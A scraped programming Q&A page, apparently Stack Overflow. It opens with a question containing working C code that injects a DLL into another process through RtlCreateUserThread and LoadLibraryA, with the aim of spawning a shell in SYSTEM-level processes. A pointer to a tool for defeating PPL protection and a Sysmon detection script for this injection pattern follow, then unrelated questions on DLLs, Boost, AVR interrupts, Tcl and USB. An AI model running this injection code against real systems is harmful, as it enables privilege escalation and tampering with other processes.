DLL injection with RtlCreateUserThread - dll-injection

I have written a program to inject a DLL.
I am using RtlCreateUserThread. Can someone tell me what I am doing wrong here? I am able to inject the DLL into processes, and the injected DLL spawns a cmd shell when injected into a process that has the same privileges as mine, but when I inject it into System/Local Service account processes it does not spawn a shell. I am using cmd.dll from Didier Stevens' site, which is from ReactOS. I am trying to do it on Windows 7 32-bit.
#include <Windows.h>
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

typedef struct _CLIENT_ID
{
    PVOID UniqueProcess;
    PVOID UniqueThread;
} CLIENT_ID, *PCLIENT_ID;

typedef long (*_RtlCreateUserThread)(HANDLE,
                                     PSECURITY_DESCRIPTOR,
                                     BOOLEAN, ULONG,
                                     PULONG, PULONG,
                                     PVOID, PVOID,
                                     PHANDLE, PCLIENT_ID);
_RtlCreateUserThread RtlCreateUserThread;

int main(){
    HANDLE hThd;
    CLIENT_ID cid;
    DWORD pid;
    char *dll = "cmd.dll";
    HMODULE ntdll = LoadLibrary("ntdll.dll");
    HMODULE k32 = LoadLibrary("kernel32.dll");
    /* GetProcAddress returns FARPROC, so cast it to the typedef'd pointer type */
    RtlCreateUserThread = (_RtlCreateUserThread)GetProcAddress(ntdll, "RtlCreateUserThread");
    printf("Enter pid :");
    scanf("%u", &pid);

    LUID luid;
    HANDLE token_handle;
    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid);
    TOKEN_PRIVILEGES tp;
    tp.Privileges[0].Luid = luid;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    tp.PrivilegeCount = 1;
    OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token_handle);
    AdjustTokenPrivileges(token_handle, false, &tp, sizeof(tp), NULL, NULL);

    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
    LPVOID vaex = VirtualAllocEx(hProc, NULL, strlen(dll) + 1, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProc, vaex, dll, strlen(dll), NULL);
    RtlCreateUserThread(hProc, NULL, false, 0, 0, 0, (PVOID)GetProcAddress(k32, "LoadLibraryA"), vaex, &hThd, &cid);
    WaitForSingleObject(hThd, INFINITE);
    CloseHandle(hThd);
    CloseHandle(hProc);
    FreeLibrary(k32);
    FreeLibrary(ntdll);
    return 0;
}
thanks,
Raja.

You cannot inject into system processes which have Protected Process Light protection.
Read Evolution of PPL and PPL Killer
This is a new protection mechanism since Windows 8/8.1
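Added defender-side example, not code from the question or the answer above: a check over Sysmon Event ID 8 (CreateRemoteThread) records for the pattern the injector in the question produces, a thread created in another process whose start address is kernel32!LoadLibraryA, and it also flags start addresses that no loaded module backs, which goes beyond the question's case. The record layout and sample events are constructed, and the high-value target list is an assumption.

```python
from dataclasses import dataclass

LOADLIBRARY_EXPORTS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}
# Assumed list: remote threads into these images (services running as SYSTEM) rate higher.
HIGH_VALUE_TARGETS = {"lsass.exe", "services.exe", "winlogon.exe", "svchost.exe"}
# Constructed sample records in a simplified "Field: value" layout of the Sysmon Event ID 8
# fields (real events also carry timestamps, GUIDs and thread ids). Sysmon writes "-" for a
# start address that no loaded module backs.
SAMPLE_EVENTS = [
    "EventID: 8\nSourceImage: C:\\Users\\raja\\inject.exe\nTargetImage: C:\\Windows\\System32\\notepad.exe\n"
    "StartModule: C:\\Windows\\System32\\kernel32.dll\nStartFunction: LoadLibraryA",
    "EventID: 8\nSourceImage: C:\\Users\\raja\\inject.exe\nTargetImage: C:\\Windows\\System32\\svchost.exe\n"
    "StartModule: C:\\Windows\\System32\\kernel32.dll\nStartFunction: LoadLibraryA",
    "EventID: 8\nSourceImage: C:\\Windows\\System32\\csrss.exe\nTargetImage: C:\\Windows\\explorer.exe\n"
    "StartModule: C:\\Windows\\System32\\ntdll.dll\nStartFunction: RtlUserThreadStart",
    "EventID: 8\nSourceImage: C:\\Users\\raja\\stage.exe\nTargetImage: C:\\Windows\\explorer.exe\n"
    "StartModule: -\nStartFunction: -",
]

@dataclass
class Finding:
    severity: str
    reason: str
    source: str
    target: str

def parse_event(text: str) -> dict[str, str]:
    """Split 'Field: value' lines on the first colon only, so 'C:\\...' paths survive."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def check_remote_thread(ev: dict[str, str]) -> list[Finding]:
    """Findings for one Event ID 8 record; an empty list means nothing was flagged."""
    src, tgt = ev.get("SourceImage", ""), ev.get("TargetImage", "")
    if ev.get("EventID") != "8" or src == tgt:
        return []
    func, module = ev.get("StartFunction", "-"), ev.get("StartModule", "-")
    if func in LOADLIBRARY_EXPORTS and basename(module) in {"kernel32.dll", "kernelbase.dll"}:
        sev = "high" if basename(tgt) in HIGH_VALUE_TARGETS else "medium"
        return [Finding(sev, f"remote thread starts at {func}: LoadLibrary DLL injection", src, tgt)]
    if module == "-":
        return [Finding("high", "remote thread start address not backed by any module", src, tgt)]
    return []

def scan(records: list[str]) -> list[Finding]:
    """Run the check over raw event texts and collect every finding."""
    return [f for text in records for f in check_remote_thread(parse_event(text))]
```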

Related

How to call upon a .dll file from C++ and extract the functions of it?

I would like to know the proper procedure for calling a .dll file while also having .cpp and .h files for a certain application. I have a program which is the .cpp file with different .h header files, and I also included the .dll file in the folder where the .cpp and .h files are located. I would like to know, in the .cpp code, how I am able to call upon this .dll file, since inside it there are different functions that will allow a DDC264 Evaluation Board to read data from memory through USB and extract the data. I am using a program called DevC++ and I am receiving a current error which is [Id] returned 1 exit status and MakefileWin has changed.
Attached below is a snippet of the .cpp code:
I also would like to know how to fix both of these errors.
// USB_IO_for_VB6.cpp : Defines the entry point for the DLL application.
//
#include "stdafx.h"
#include "USB_IO_For_VB6.h"
#include "CyAPI.h"
#include <cstring>
#include <malloc.h>
#include "BASETSD.H"
#include <math.h>
#include <stdio.h>
// #include <string.h>

BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// This is an example of an exported variable
//int USB_IO_FOR_VB6_EXPORTS int USB_IO_for_VB6_API =22;
USB_IO_FOR_VB6_API int nUSB_IO_for_VB6 = 22;

#define STRINGLEN 65536        // the larger this number is, the faster the data is shifted in.
#define MAX_CHANNELS_FAST 4096 // 2048 = 1024A + 1024B
#define DBP 0                  // debug print - 1 enables writing some information to a file in "C:\temp\"

// This function reads the device descriptors from the Cypress USB Chip(s).
// It returns arrays of values, one set of values per device detected.
// The user can then use the visual basic software to select which device to use.
int __stdcall ReadDeviceDescriptors(int *USBdevCount, int *bLengthPass, int *bDescriptorTypePass,
                                    long *bcdUSBPass, int *bDeviceClassPass, int *bDeviceSubClassPass,
                                    int *bDeviceProtocolPass, int *bMaxPacketSize0Pass, long *idVendorPass,
                                    long *idProductPass, long *bcdDevicePass, int *iManufacturerPass,
                                    int *iProductPass, int *iSerialNumberPass, int *bNumConfigurationsPass)
{
    CCyUSBDevice *USBDevice;
    USB_DEVICE_DESCRIPTOR descr;
    USBDevice = new CCyUSBDevice(NULL); // Create an instance of CCyUSBDevice
    USBdevCount[0] = USBDevice->DeviceCount();
    for (int i = 0; i < USBDevice->DeviceCount(); i++)
    {
        if (USBDevice->Open(i))
        {
            USBDevice->GetDeviceDescriptor(&descr);
            bLengthPass[i] = descr.bLength;
            bDescriptorTypePass[i] = descr.bDescriptorType;
            bcdUSBPass[i] = descr.bcdUSB;
            bDeviceClassPass[i] = descr.bDeviceClass;
            bDeviceSubClassPass[i] = descr.bDeviceSubClass;
            bDeviceProtocolPass[i] = descr.bDeviceProtocol;
            bMaxPacketSize0Pass[i] = descr.bMaxPacketSize0;
            idVendorPass[i] = descr.idVendor;
            idProductPass[i] = descr.idProduct;
            bcdDevicePass[i] = descr.bcdDevice;
            iManufacturerPass[i] = descr.iManufacturer;
            iProductPass[i] = descr.iProduct;
            iSerialNumberPass[i] = descr.iSerialNumber;
            bNumConfigurationsPass[i] = descr.bNumConfigurations;
            USBDevice->Close();
        }
    }
    delete USBDevice; // the instance was never freed in the original; release it before returning
    return( USBdevCount[0] );
}
I am not sure about how to go about calling a .dll file in C++; I am fairly new to object-oriented programming.
Regarding the MakefileWin error, I tried changing the TDM-GCC release version from 32 to 64 bits and the error continues.
I also tried deleting dllmain.cpp, which is another cpp file that is not needed, and moving another original.cpp file from the folder that is shown in one of the images.
I only have a single .cpp file running on my DevC++ compiler, which I thought would not cause the error [Id] returned 1 exit status to pop up.

Boost asio crashes

I have a program using cpprestsdk for HTTP querying and websocketpp for subscribing to a data stream. The program crashes immediately (it says Process finished with exit code 139 (interrupted by signal 11: SIGSEGV)). But if I comment out either the HTTP querying or the data stream subscription, the program won't crash.
#include <websocketpp/config/asio_client.hpp>
#include <websocketpp/client.hpp>
#include "json.hpp"
#include <iostream>
#include <ctime>
#include <chrono>   // std::chrono::milliseconds used in main
#include <thread>   // std::this_thread::sleep_for used in main
#include <cpprest/http_client.h>
#include <cpprest/filestream.h>
#include <vector>
#include <string>

using std::string;
using namespace web;
using std::cout, std::endl;
using std::vector;
using websocketpp::lib::placeholders::_1;
using websocketpp::lib::placeholders::_2;
using websocketpp::lib::bind;

typedef websocketpp::client<websocketpp::config::asio_tls_client> client;
typedef websocketpp::config::asio_client::message_type::ptr message_ptr;

void on_stream_data(websocketpp::connection_hdl hdl, message_ptr msg) {
}

class OrderBook {
public:
    void initialize() {
        web::http::client::http_client_config cfg;
        std::string uri = string("https://fapi.binance.com/fapi/v1/depth?symbol=btcusdt&limit=1000");
        web::http::client::http_client client(U(uri), cfg);
        web::http::http_request request(web::http::methods::GET);
        request.headers().add("Content-Type", "application/x-www-form-urlencoded");
        web::http::http_response response = client.request(request).get();
    }

    int start_stream() {
        client c;
        std::string uri = string("wss://fstream.binance.com/ws/btcusdt#depth#100ms");
        try {
            c.set_access_channels(websocketpp::log::alevel::all);
            c.clear_access_channels(websocketpp::log::alevel::frame_payload);
            c.init_asio();
            c.set_message_handler(bind(on_stream_data, ::_1, ::_2));
            websocketpp::lib::error_code ec;
            client::connection_ptr con = c.get_connection(uri, ec);
            if (ec) {
                std::cout << "could not create connection because: " << ec.message() << std::endl;
                return 0;
            }
            c.connect(con);
            c.run();
        } catch (websocketpp::exception const &e) {
            std::cout << e.what() << std::endl;
        }
        return 0; // the original fell off the end of a non-void function here
    }
};

int main(int argc, char *argv[]) {
    OrderBook ob;
    ob.initialize(); // comment out either of these two lines and the program won't crash; otherwise it crashes on start
    std::this_thread::sleep_for(std::chrono::milliseconds(10000000));
    ob.start_stream(); // comment out either of these two lines and the program won't crash; otherwise it crashes on start
}
When I run this program in CLion debug mode, CLion shows that the crash comes from a function in /opt/homebrew/Cellar/boost/1.76.0/include/boost/asio/ssl/detail/impl/engine.ipp
    int engine::do_connect(void*, std::size_t)
    {
      return ::SSL_connect(ssl_);
    }
It says Exception: EXC_BAD_ACCESS (code=1, address=0xf000000000)
What's wrong with it? Is it because I run two pieces of code using boost::asio, and something shouldn't be initialized twice?
I can compile this and run it fine.
My best bet is that you might be mixing versions, particularly boost versions. A common mode of failure is caused when ODR violations lead to Undefined Behaviour.
Note that these header-only libraries depend on a number of boost libraries that are not header-only (e.g. Boost System, Thread and/or Chrono). You need to compile against the same version as the libraries you link.
If you use distribution packaged versions of any library (cpprestsdk, websocketpp or whatever json library that is you're using) then you'd be safest also using the distribution packaged version of Boost.
I'd personally simplify the situation by just using Boost (Beast for HTTP/websocket, Json for, you guessed it).
Running it all on a test Ubuntu 18.04 with the OS Boost 1.65 version, the start_stream sequence triggers this informative error:
    [2022-05-22 13:42:11] [fatal] Required tls_init handler not present.
    could not create connection because: Connection creation attempt failed
While being UBSAN/ASAN clean. Perhaps that error helps you, once you figure out the configuration problems that made your program crash.

Static declaration of '__vector_1' follows non-static declaration

I'm trying to create a program which will interrupt when I press the button. I have an Atmega8 and I use Microchip Studio for coding.
I checked the document about interrupts on Atmega's website; however, I can't say I totally got it.
Here is my code:
#define F_CPU 1000000UL
#define IRQ1 INT0_vect
#define IRQ2 INT1_vect
#include <avr/io.h>
#include <util/delay.h>
#include <avr/interrupt.h>

void init()
{
    DDRB = 0b11111111;
    PORTB = 255;
    _delay_ms(2000);
    PORTB = 0;
    DDRD = 0b00000000;
    GICR = 0xc0;
    MCUCR = 0x08;
}

int main(void){
    init();
    volatile int mode = 0;
    ISR(IRQ1){
        _delay_ms(500);
        if (mode < 3) mode++; else mode = 0;
    }
    ISR(IRQ2){
        _delay_ms(150);
    }
}
Errors I get:
I would be glad if any admin edits my question and add picture here, website doesn't let me add photo because I need at least 10 reputation to post image
Don't try to define functions inside of other functions unless you really know what you are doing. You should move the ISR definitions to the top level of the file, putting them outside of main.

How to make a loadable dll to use tcl code functionality by any program

I have created a GUI using Tcl. I want to make some of the core functionality of the Tcl code available to any program which supports DLLs. For that I have taken a very simple Tcl code example, which adds two integer numbers, and I have written a C wrapper function to use this functionality. This is working for me. Now how can I create a DLL from these two C and Tcl files, so that any program can use this addition functionality by simply loading the DLL?
Here is my simple Tcl code:
#!/usr/bin/env tclsh8.5
# Filename : simple_addition.tcl   (Tcl comments use '#'; a C-style /* */ comment is not valid Tcl)
proc add_two_nos { } {
    set a 10
    set b 20
    set c [expr { $a + $b } ]
    puts " c is $c ......."
}
And here is my C wrapper function which uses the above Tcl addition functionality:
#include <tcl.h>
#include <tclDecls.h>
#include <tclPlatDecls.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main (int argc, char **argv) {
    Tcl_Interp *interp;
    int code;
    char *result;
    printf("inside main function \n");
    Tcl_FindExecutable(argv[0]);
    interp = Tcl_CreateInterp();
    code = Tcl_Eval(interp, "source simple_addition.tcl; add_two_nos");
    /* Retrieve the result... */
    result = Tcl_GetString(Tcl_GetObjResult(interp));
    /* Check for error! If an error, message is result. */
    if (code == TCL_ERROR) {
        fprintf(stderr, "ERROR in script: %s\n", result);
        exit(1);
    }
    /* Print (normal) result if non-empty; we'll skip handling encodings for now */
    if (strlen(result)) {
        printf("%s\n", result);
    }
    /* Clean up */
    Tcl_DeleteInterp(interp);
    exit(0);
}
This C wrapper is working fine for me and gives correct results.
Now I want to create a DLL file, so that if I include that DLL in any program that supports DLLs, it should be able to use this addition functionality of the above Tcl code. Can anybody please tell me the way I can do it? Please help me. I am new to this DLL concept.
In order to create the .dll you'll have to use something like Visual Studio and C or C++ to create the .dll (there are lots of other tools out there that can create .dll files, but VS is easy to get hold of and to use). So in VS create a new project; this needs to be a C++ WIN32 project. Select the DLL application type and the Export Symbols additional option.
VS will create a basic .dll that you can then amend to do what you want. In short, I'd look at putting the creation/destruction of the interpreter into the DllMain:
#include <windows.h>
#include <tcl.h>

static Tcl_Interp *interp; /* shared by the functions the DLL exports */

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        Tcl_FindExecutable(NULL);
        interp = Tcl_CreateInterp();
        break; /* without this the case fell through into DLL_THREAD_ATTACH */
    }
    case DLL_THREAD_ATTACH:
        break ;
    case DLL_THREAD_DETACH:
        break ;
    case DLL_PROCESS_DETACH:
    {
        Tcl_DeleteInterp(interp);
        break;
    }
    }
    return TRUE;
}
and then create functions exported by the .dll that make use of the interpreter. If you aren't familiar with the concept of shared libraries then I'd suggest spending a little time reading up on them; try here and here for some background reading.

Sending instructions to USB device

Basically, I am trying to control a USB device (a linear actuator control board) using the supplied DLL (mpusbapi.dll) and header file (mpusbapi.h). However, I can't for the life of me figure out which parameters I need to pass into MPUSBWrite().
In particular, the 2nd, 3rd and 4th parameters of MPUSBWrite(). The first parameter is clearly the handle that is returned by MPUSBOpen() and the last parameter is a timeout in ms.
I have a hunch it has something to do with page 6 of LAC advance config.
Any help is GREATLY appreciated. Thanks!
mpusbapi.h file:
#ifndef _MPUSBAPI_H_
#define _MPUSBAPI_H_

#define MPUSB_FAIL    0
#define MPUSB_SUCCESS 1
#define MP_WRITE      0
#define MP_READ       1

// MAX_NUM_MPUSB_DEV is an abstract limitation.
// It is very unlikely that a computer system will have more
// then 127 USB devices attached to it. (single or multiple USB hosts)
#define MAX_NUM_MPUSB_DEV 127

DWORD  (*MPUSBGetDLLVersion)(void);
DWORD  (*MPUSBGetDeviceCount)(PCHAR pVID_PID);
HANDLE (*MPUSBOpen)(DWORD instance,          // Input
                    PCHAR pVID_PID,          // Input
                    PCHAR pEP,               // Input
                    DWORD dwDir,             // Input
                    DWORD dwReserved);       // Input <Future Use>
DWORD  (*MPUSBRead)(HANDLE handle,           // Input
                    PVOID pData,             // Output
                    DWORD dwLen,             // Input
                    PDWORD pLength,          // Output
                    DWORD dwMilliseconds);   // Input
DWORD  (*MPUSBWrite)(HANDLE handle,          // Input
                     PVOID pData,            // Input
                     DWORD dwLen,            // Input
                     PDWORD pLength,         // Output
                     DWORD dwMilliseconds);  // Input
DWORD  (*MPUSBReadInt)(HANDLE handle,        // Input
                       PVOID pData,          // Output
                       DWORD dwLen,          // Input
                       PDWORD pLength,       // Output
                       DWORD dwMilliseconds);// Input
BOOL   (*MPUSBClose)(HANDLE handle);

#endif
LACTesting.cpp file:
#include <windows.h>   // This is a windows header file. The functions I mentioned above are declared here
#include "mpusbapi.h"  // This is the header file supplied. It declares the function prototypes that are defined in the DLL
#include <iostream>
#include "ioctls.h"
using namespace std;

int main(int argc, char* argv[])   // argv is an array of C strings, not a single char*
{
    // Try to load the library
    HMODULE mpbusDLL = NULL;
    mpbusDLL = LoadLibraryW(L"mpusbapi.dll"); // wide literal, so call the W variant explicitly
    if (mpbusDLL != NULL) {
        // If the library could be loaded, then load the functions using GetProcAddress()
        MPUSBOpen=(HANDLE(*)(DWORD,PCHAR,PCHAR,DWORD,DWORD))GetProcAddress(mpbusDLL,"_MPUSBOpen");
        MPUSBGetDLLVersion=(DWORD(*)(void))GetProcAddress(mpbusDLL,"_MPUSBGetDLLVersion");
        MPUSBGetDeviceCount=(DWORD(*)(PCHAR))GetProcAddress(mpbusDLL,"_MPUSBGetDeviceCount");
        MPUSBWrite=(DWORD(*)(HANDLE,PVOID,DWORD,PDWORD,DWORD))GetProcAddress(mpbusDLL,"_MPUSBWrite");
        MPUSBRead=(DWORD(*)(HANDLE,PVOID,DWORD,PDWORD,DWORD))GetProcAddress(mpbusDLL,"_MPUSBRead");
        MPUSBReadInt=(DWORD(*)(HANDLE,PVOID,DWORD,PDWORD,DWORD))GetProcAddress(mpbusDLL,"_MPUSBReadInt");
        MPUSBClose=(BOOL(*)(HANDLE))GetProcAddress(mpbusDLL,"_MPUSBClose");
    }
    else {
        //If the DLL didn't load, let me know! (and stop: the function pointers below would be NULL)
        cout<<"DLL didn't load"<<endl;
        return 1;
    }

    //Declarations
    HANDLE LACHandle;
    PCHAR pipeName=MCHPUSB_PIPE_NAME;     // initializes pipeName to "\\MCHP_EP"
    char VidPid[]="vid_04d8&pid_fc5f";    // writable buffer, since the API takes PCHAR rather than const char*
    LACHandle=MPUSBOpen(0,VidPid,pipeName,1,0);//open device connection
    //Not sure if I pass in the correct arguments for MPUSBOpen. VidPid and pipeName are correct.
    cout<<"Device ID "<<VidPid<<" is open with "<<MPUSBGetDeviceCount(VidPid)<<" device(s)."<<endl;
    //MPUSBWrite(LACHandle,,3,,1000); <- this is where I am having issues.
    //I can't figure out how to use MPUSBWrite
    MPUSBClose(LACHandle);// closes device connection
    return 0;
}
I think you should take a look at
Win32 Data Types
then work on Windows System Programming samples, then you will clearly understand the logic.
To your question, as I see the code I can guess:
    // yourData which you want to write
    PVOID pData
    // sizeof(yourData) google "sizeof"
    DWORD dwLen
    /* I have no idea about this, but it's output; you can see it
       after running the function */
    PDWORD pLength
Hope this helps